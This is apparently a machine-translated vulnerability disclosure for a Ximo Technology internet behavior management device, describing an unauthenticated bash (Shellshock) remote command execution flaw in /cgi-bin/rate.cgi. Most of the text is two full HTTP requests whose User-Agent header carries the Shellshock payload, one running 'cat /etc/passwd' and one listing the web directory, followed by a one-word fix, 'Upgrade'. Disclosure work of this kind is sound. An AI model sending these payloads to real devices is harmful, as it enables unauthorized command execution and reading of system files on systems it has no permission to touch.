The remote command execution vulnerability of the internet behavior management device of Ximo Technology (No Logon required)
The remote command execution vulnerability of the internet behavior management device of Ximo Technology (No Logon required)
Someone submitted this system two days ago:
Http ://**. **. **. **/bugs/wooyun-2016-0168680 **. **. **. **: 82/index. php/user/login has been tested and found to have the following url. The bash vulnerability proves as follows:
**. **: 82/cgi-bin/rate. cgi0x00: Run cat/etc/passwd to send the following data packets:
GET /cgi-bin/rate.cgi HTTP/1.1Host: **.**.**.**Accept-Encoding: gzip,deflateUser-Agent: () { :;}; echo `/bin/cat /etc/passwd`Connection: CloseAccept: */*
0x01 Run ls-al/xmacg/web/to send the following packets:
GET /cgi-bin/rate.cgi HTTP/1.1Host: **.**.**.**Accept-Encoding: gzip,deflateUser-Agent: () { :;}; echo `/bin/ls -al /xmacg/web/`Connection: CloseAccept: */*
/bin/cat /etc/passwd
Solution:
Upgrade